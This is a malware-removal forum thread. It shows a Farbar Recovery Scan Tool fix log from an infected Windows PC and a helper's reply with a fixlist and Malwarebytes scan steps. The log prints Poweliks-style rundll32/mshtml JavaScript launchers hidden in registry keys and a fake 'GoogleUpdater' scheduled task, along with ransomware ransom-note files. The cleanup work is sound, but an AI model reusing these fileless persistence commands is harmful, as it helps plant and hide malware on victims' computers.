2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2015-07-10 18:04 - 2014-11-21 05:16 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2015-07-10 15:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Registration
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RSD C:\WINDOWS\Media
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RHD C:\Users\Public\Libraries
2015-07-10 14:54 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2015-07-10 14:54 - 2013-04-23 03:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Communication and Chat
2015-07-10 14:54 - 2013-04-23 03:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink LabelPrint
2015-07-10 14:54 - 2013-04-23 03:23 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2015-07-10 14:54 - 2012-08-17 14:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-07-10 14:54 - 2012-08-17 14:13 - 00000000 ____D C:\WINDOWS\en
2015-07-10 14:54 - 2012-08-17 14:12 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live
2015-07-10 14:53 - 2013-08-22 11:37 - 00005217 _____ C:\WINDOWS\DtcInstall.log
2015-07-10 14:53 - 2012-07-26 01:37 - 00000000 ____D C:\Users\Default.migrated
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\WCN
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\system32\WCN
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\spool
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\IME
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\SysWOW64\SMI
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-07-10 14:52 - 2013-04-23 03:06 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2015-07-10 14:52 - 2012-08-17 14:07 - 00000000 ____D C:\WINDOWS\SysWOW64\Adobe
2015-07-10 14:50 - 2013-08-22 11:43 - 00000000 ____D C:\WINDOWS\DigitalLocker
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Help
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-07-10 14:50 - 2012-08-03 18:29 - 00000000 ____D C:\ProgramData\PRICache
2015-07-10 14:46 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\Recovery
2015-07-10 14:14 - 2013-08-22 09:36 - 00000000 __RHD C:\Users\Default
2015-07-10 13:48 - 2013-06-06 20:03 - 02013866 _____ C:\WINDOWS\WindowsUpdate (1).log
2015-07-10 10:22 - 2012-07-26 04:12 - 00000000 ____D C:\WINDOWS\AUInstallAgent
2015-07-06 16:41 - 2015-06-21 01:14 - 00000000 ____D C:\Users\Public\Downloads\Norton
2015-07-03 08:43 - 2013-07-17 21:58 - 130333168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
 
Some files in TEMP:
====================
C:\Users\Richie\AppData\Local\Temp\avgnt.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-07-28 16:17
 
==================== End of log ============================
 
 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:28-07-2015
Ran by Richie (2015-07-29 17:51:12) Run:1
Running from C:\Users\Richie\Desktop
Loaded Profiles: Richie (Available Profiles: Richie)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CloseProcesses:
EmptyTemp:
 
HKLM-x32\...\Run: [{b090579d-244c-e682-7cd6-e6daa5c7aff0}] => "C:\ProgramData\Microsoft\{b090579d-244c-e682-7cd6-e6daa5c7aff0}\{b090579d-244c-e682-7cd6-e6daa5c7aff0}.exe"
HKLM Group Policy restriction on software: C:\Program Files\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\Run: [ivijios] => rundll32 "C:\Users\Richie\AppData\Local\ivijios.dll",ivijios <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{eedc51b2-9627-4964-8aab-3c12119ef845} <======= ATTENTION (Policy restriction on IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...d={searchTerms}
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...d={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...d={searchTerms}
2015-07-17 10:59 - 2015-07-17 10:59 - 00266240 _____ C:\Users\Richie\AppData\Roaming\7afd7914.dll
2015-07-14 08:21 - 2015-07-20 08:35 - 00000000 ___HD C:\7afd7914
2015-07-13 15:33 - 2015-07-13 15:33 - 00000000 ____D C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
2015-07-10 15:34 - 2015-07-28 13:17 - 00000000 ____D C:\Users\Richie\AppData\Local\{beedd195-7534-c93e-bcaf-0a2671d4725d}
2015-07-10 15:34 - 2015-07-10 15:34 - 00000000 ___HD C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
2015-07-28 13:17 - 2014-12-06 22:56 - 00000000 ____D C:\ProgramData\LeboBukmo
2015-07-28 13:17 - 2014-11-26 00:56 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate
2015-07-28 13:17 - 2014-11-21 00:32 - 00000000 ____D C:\ProgramData\IomuTdilf
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate7
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\XesviPteyu
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\IojdOnyo
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\XiboHbik
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\EoxoKazxa
2015-07-28 13:17 - 2014-11-07 20:16 - 00000000 ____D C:\ProgramData\RogoLatk
2015-07-28 13:17 - 2014-11-07 20:15 - 00000000 ____D C:\ProgramData\BoweCpeb
2015-07-28 11:47 - 2014-11-05 01:20 - 00000000 ____D C:\ProgramData\HezagTonag
2015-07-10 14:50 - 2013-06-06 20:07 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services
2015-07-10 14:50 - 2012-08-17 14:05 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
2015-07-08 07:59 - 2014-12-13 10:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Ecidcuo
2015-07-08 07:59 - 2014-12-06 22:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Evcoguyl
2015-07-08 07:59 - 2014-11-21 00:33 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Urablax
2015-07-17 10:59 - 2015-07-17 10:59 - 0266240 _____ () C:\Users\Richie\AppData\Roaming\7afd7914.dll
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2015-01-29 00:25 - 2015-01-29 00:25 - 0008528 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-29 00:25 - 2015-01-29 00:25 - 0045533 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-29 00:25 - 2015-01-29 00:25 - 0004204 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT
2015-01-29 00:25 - 2015-01-29 00:25 - 0000272 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL
2014-11-11 19:24 - 2014-11-11 19:24 - 0000448 ____H () C:\Users\Richie\AppData\Roaming\麽鎒駓覜
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.URL
2015-01-29 00:24 - 2015-01-29 00:24 - 0008528 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.HTML
2015-01-29 00:24 - 2015-01-29 00:24 - 0045533 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.PNG
2015-01-29 00:24 - 2015-01-29 00:24 - 0004204 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.TXT
2015-01-29 00:24 - 2015-01-29 00:24 - 0000272 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.URL
2014-11-11 19:24 - 2015-01-28 23:26 - 0000664 _____ () C:\ProgramData\@system.temp
2014-11-11 19:25 - 2015-01-28 23:27 - 0000400 ____H () C:\ProgramData\@system3.att
CustomCLSID: HKU\S-1-5-21-2321640021-2341620851-140482586-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: {42606C78-3E7A-474E-9FB5-D30D039784CB} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {F5715D4F-B262-4590-8487-ACEB028F19D5} - System32\Tasks\autochk => C:\Users\Richie\AppData\Roaming\Microsoft\Windows\IEUpdate\autochk.exe <==== ATTENTION
C:\users\richie\appdata\roaming\microsoft\windows\ieupdate
C:\users\richie\appdata\local\svcxdcl32.exe
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll"
 
RemoveProxy:
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
*****************
 
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\{b090579d-244c-e682-7cd6-e6daa5c7aff0} => value removed successfully
HKLM => Group Policy Restriction on software restored successfully
HKLM => Group Policy Restriction on software restored successfully
"HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" => key removed successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Windows\CurrentVersion\Run\\ivijios => value removed successfully
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => key removed successfully
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => key removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy => value removed successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found. 
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found. 
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\Wow6432Node\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\Wow6432Node\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\Wow6432Node\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found. 
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found. 
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found. 
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found. 
"HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found. 
"C:\Users\Richie\AppData\Roaming\7afd7914.dll" => File/Folder not found.
C:\7afd7914 => moved successfully.
C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F} => moved successfully.
C:\Users\Richie\AppData\Local\{beedd195-7534-c93e-bcaf-0a2671d4725d} => moved successfully.
 
"C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}" folder move:
 
Could not move "C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}" => Scheduled to move on reboot.
 
C:\ProgramData\LeboBukmo => moved successfully.
C:\Users\Richie\AppData\Roaming\FrameworkUpdate => moved successfully.
C:\ProgramData\IomuTdilf => moved successfully.
C:\Users\Richie\AppData\Roaming\FrameworkUpdate7 => moved successfully.
C:\ProgramData\XesviPteyu => moved successfully.
C:\ProgramData\IojdOnyo => moved successfully.
C:\ProgramData\XiboHbik => moved successfully.
C:\ProgramData\EoxoKazxa => moved successfully.
C:\ProgramData\RogoLatk => moved successfully.
C:\ProgramData\BoweCpeb => moved successfully.
C:\ProgramData\HezagTonag => moved successfully.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services => moved successfully.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection => moved successfully.
C:\Users\Richie\AppData\Roaming\Ecidcuo => moved successfully.
C:\Users\Richie\AppData\Roaming\Evcoguyl => moved successfully.
C:\Users\Richie\AppData\Roaming\Urablax => moved successfully.
"C:\Users\Richie\AppData\Roaming\7afd7914.dll" => File/Folder not found.
C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML => moved successfully.
C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT => moved successfully.
C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.URL => moved successfully.
C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML => moved successfully.
C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.PNG => moved successfully.
C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT => moved successfully.
C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL => moved successfully.
C:\Users\Richie\AppData\Roaming\麽鎒駓覜 => moved successfully.
C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML => moved successfully.
C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT => moved successfully.
C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.URL => moved successfully.
C:\Users\Richie\AppData\Local\HELP_DECRYPT.HTML => moved successfully.
C:\Users\Richie\AppData\Local\HELP_DECRYPT.PNG => moved successfully.
C:\Users\Richie\AppData\Local\HELP_DECRYPT.TXT => moved successfully.
C:\Users\Richie\AppData\Local\HELP_DECRYPT.URL => moved successfully.
C:\ProgramData\@system.temp => moved successfully.
C:\ProgramData\@system3.att => moved successfully.
HKU\S-1-5-21-2321640021-2341620851-140482586-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{42606C78-3E7A-474E-9FB5-D30D039784CB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42606C78-3E7A-474E-9FB5-D30D039784CB}" => key removed successfully
C:\Windows\System32\Tasks\GoogleUpdater => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdater" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F5715D4F-B262-4590-8487-ACEB028F19D5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F5715D4F-B262-4590-8487-ACEB028F19D5}" => key removed successfully
C:\Windows\System32\Tasks\autochk => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\autochk" => key removed successfully
"C:\users\richie\appdata\roaming\microsoft\windows\ieupdate" => File/Folder not found.
"C:\users\richie\appdata\local\svcxdcl32.exe" => File/Folder not found.
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}" => Error: No automatic fix found for this entry.
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Windows\CurrentVersion\Run\\HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}" => value not found.
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Windows\CurrentVersion\Run\\HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll" => value not found.
 
========= RemoveProxy: =========
 
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
 
 
========= End of RemoveProxy: =========
 
 
=========  bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.7.9600 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
Unable to cancel {A0B92677-F8A4-41B6-B366-76E42D108201}.
Unable to cancel {FC31FA8D-E904-4827-A396-A3C52B93D920}.
Unable to cancel {4F1920D9-CEF1-48F7-9914-C15A01665488}.
Unable to cancel {E867E1AF-1B20-47C5-B70A-856BDC49A7CB}.
Unable to cancel {1A03CCBA-B4B0-42DC-95CD-1FC92FCDF94C}.
Unable to cancel {F11AE051-05D5-4D33-97DA-3CCFD9B22E66}.
Unable to cancel {F29A5325-EA0B-4E89-BCAB-AD6D10CEC8AC}.
Unable to cancel {A70E2C99-7F91-4888-A1C8-CC273458379C}.
Unable to cancel {5D5E5EC8-1011-4069-B6AC-6AF8E75CCD3F}.
Unable to cancel {287AE5EE-FC45-42C8-9C1D-86C50EF5D7EE}.
Unable to cancel {34199713-82AE-4A8E-BE27-C39F9015664D}.
Unable to cancel {C8B2F491-B299-40E7-B87C-52AD8ADA5BC3}.
Unable to cancel {D80313B9-16BC-495F-BED8-865E2CFD11B5}.
{0F663357-8073-4A09-A7DF-4CAE8AA5D844} canceled.
{CAC120E3-7F7D-4470-96BF-480051C165BB} canceled.
Unable to cancel {7C9194B6-4FF2-45B2-881D-C4BD3FCA5BC4}.
Unable to cancel {C2BBED31-3093-4B66-9B38-9B31EC1964F5}.
2 out of 17 jobs canceled.
 
========= End of CMD: =========
 
 
=========  netsh advfirewall reset =========
 
Ok.
 
 
========= End of CMD: =========
 
 
=========  netsh advfirewall set allprofiles state ON =========
 
Ok.
 
 
========= End of CMD: =========
 
EmptyTemp: => 4.9 GB temporary data Removed.
 
Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 2015-07-29 20:39:27)<=
 
C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0} => Is moved successfully
 
==== End of Fixlog 20:39:27 ====

  • 0

#4
Pyxis
Posted 30 July 2015 - 08:10 AM

Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts
Hi smwifey,

Did you do Step 2? The things that are in there need to be enabled before I can remove them. :) I'll just repeat that part here.
  • Step 1

    Copy and paste the following into Notepad and save as fixlist.txt to your desktop:
    2015-07-29 20:41 - 2015-07-29 20:41 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vfrrubmu.sys
S1 vfrrubmu; C:\WINDOWS\system32\drivers\vfrrubmu.sys [55168 2015-07-29] (Microsoft Corporation)
AlternateDataStreams: C:\WINDOWS\system32\Drivers\vfrrubmu.sys:changelist
C:\WINDOWS\system32\Drivers\vfrrubmu.sys
    • Run your copy of FRST. It is important to ensure it is located in your desktop.
    • Press the Fix button.
    • It will produce a log (fixlog.txt) once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 2

    Download the free version of 'Malwarebytes Anti-Malware by Malwarebytes Corporation' and save it to your desktop.
    • Double-click mbam-setup-*.exe and proceed to installing the program.
      • Accept the License Agreement.
      • At the end, untick Enable free trial of Malwarebytes Anti-Malware Premium and ensure Launch Malwarebytes' Anti-Malware is checked.
      • Click Finish after.
    • Once the program has loaded, navigate to the Settings tab and select Detection and Protection.
      • Tick the Scan For Rootkits box.
    • Go back to the Dashboard and select Update Now. Click Scan Now after.
      • Updates can sometimes still be present. Be sure to select Update Now again if you are prompted.
      • Once the scan is complete, click Apply Actions.
